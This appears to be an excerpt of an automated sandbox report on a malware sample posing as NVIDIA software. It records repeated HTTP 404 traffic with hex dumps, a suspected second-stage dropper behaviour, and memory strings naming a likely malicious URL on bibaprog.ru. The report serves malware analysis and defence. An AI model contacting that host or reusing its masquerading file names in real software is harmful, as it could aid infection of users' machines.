4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:39:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo4ZQVYAP3x8MiYnm%2FSCsFy%2BDzyY2mrgWLJqntSZA%2BnvV%2FZvC0l9wet0Knm9r4YVyAcGoYiPQBvRZIfZBY77j%2FSOLavmeybH6EHMYiLpJadSCgLKbzWw%2BPHTO5IV4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901573a4b99c4414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8473&min_rtt=1701&rtt_var=14183&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=26125&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=APr2lqU7VFkZCQUc%2Fee7yWvt1P3VmVd%2B9faIEMd8rBdhmzzcV4XOSrwpg%2BJFm4JVjiU%2FQ0gxzg84nVcwEAeSAnN2uf72ewTQC7ERT66jwm5XM2WDdFcURqkOaCfIpQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901573e9fb197c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=10020&min_rtt=1905&rtt_var=16944&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=21848&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCCqGn9HDvQOcZ5nbd3uYz%2Fopg%2FkcFT%2FKqZEn5Higo66NQQWldB%2FvvNLtMYF%2BDfTQAkA%2FqFlQye9Rjy9z0QEANI7lt5Jim3xfqyT8KevqoeqrTwjt8lnok6N%2FW4oCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901574149ab34414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3487&min_rtt=1749&rtt_var=4133&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=93231&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YmI6cNhDLj3T69PntJ6dYFC9zeSQY6d8XNSjPjV4oa0hTkbflWYzHqwyJHxj8zItutf%2FxTrOeB2H666lSPYDmOx6E1PUu1LXKOgd1129jeYZnMeafHEt92RvfQ5Nw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015745929ad42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4653&min_rtt=1725&rtt_var=6503&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=58047&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOCQeiDFF%2BSlQHkxsRsTMVMsqexuK2JWNt69h04yRXISCBPSov%2F4%2B9OsUXZ7c%2F7J4Rdon%2FlU4BgXpZvUSdQ4mj8S5CkY%2FtwmmywLU1b2YRNV2RGEKow%2FP63qnvyt4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015749dea638ca1-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3137&min_rtt=1947&rtt_var=3110&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=127299&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dr8GGqLOcodGl6LM5ZUhxyf2u8u3MmwpMmsC8yelzQct8Y5JCzCHQMRmtp2hYh%2BckF0ydhEmoUYhdW4%2BcAwujCZAHzKNvnHQJVFjnkkeSP8tZrgwCgVr6YxsCDNrg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901574e3cac48ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=9847&min_rtt=1911&rtt_var=16589&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=22324&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKeu3gXIji3cbwW5w57ipMDpjDL%2B126SQzBManIMcKQ1d5QBIbyzHYWxyqu3m%2B6878TUubCLfOVUoIwtnXCnDvjUgHpP5UAlKt92Owyl%2FUKmKHsUi8GeZVYxSJmxkw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015752aacab42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4514&min_rtt=1702&rtt_var=6262&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=60333&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:41:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ae7YIM97bDDZZ0c2gicRSD31Ijtk8Y08Hedyl%2Bo3%2B5l9DzX0bYx7B02CbASv%2F6qWSdYM%2FRaPd30t2W5I3wLNaFraKSj45IqZ%2B%2BV1hDIcw42TX6ZGNwnxTzdYwXo%2Fdw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015756f8ef642e9-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=1837&rtt_var=5458&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=69803&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.000000000302D000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000003115000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.000000000398E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000003121000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.000000000314B000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bibaprog.ru
Source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bibaprog.ru/
Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php
Source: NVIDIA Container.exe, 00000005.00000002.2111607409.00000000038E7000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Code function: 0_2_01006FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_01006FAA

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0100848E	0_2_0100848E
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_01017153	0_2_01017153
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_010251C9	0_2_010251C9
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_01014088	0_2_01014088
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_010100B7	0_2_010100B7
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_010040FE	0_2_010040FE
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_010143BF	0_2_010143BF
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_010162CA	0_2_010162CA
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_010032F7	0_2_010032F7
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0100C426	0_2_0100C426
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0102D440	0_2_0102D440
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0100F461	0_2_0100F461
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_010177EF	0_2_010177EF
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0100E9B7	0_2_0100E9B7
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_010319F4	0_2_010319F4
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0100286B	0_2_0100286B
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0102D8EE	0_2_0102D8EE
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_01016CDC	0_2_01016CDC
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_01024F9A	0_2_01024F9A
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_0100EFE2	0_2_0100EFE2
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Code function: 0_2_01013E0B	0_2_01013E0B
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF848F10DAC	5_2_00007FF848F10DAC
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF8490C62F5	5_2_00007FF8490C62F5
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF8490C6335	5_2_00007FF8490C6335
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF84916062B	5_2_00007FF84916062B
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF8491605A4	5_2_00007FF8491605A4
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Code function: 5_2_00007FF84916057B	5_2_00007FF84916057B
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F6A469	12_2_00007FF848F6A469
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F5A4C4	12_2_00007FF848F5A4C4
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F65029	12_2_00007FF848F65029
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F10DAC	12_2_00007FF848F10DAC
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F277F8	12_2_00007FF848F277F8
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Code function: 12_2_00007FF848F1F543	12_2_00007FF848F1F543
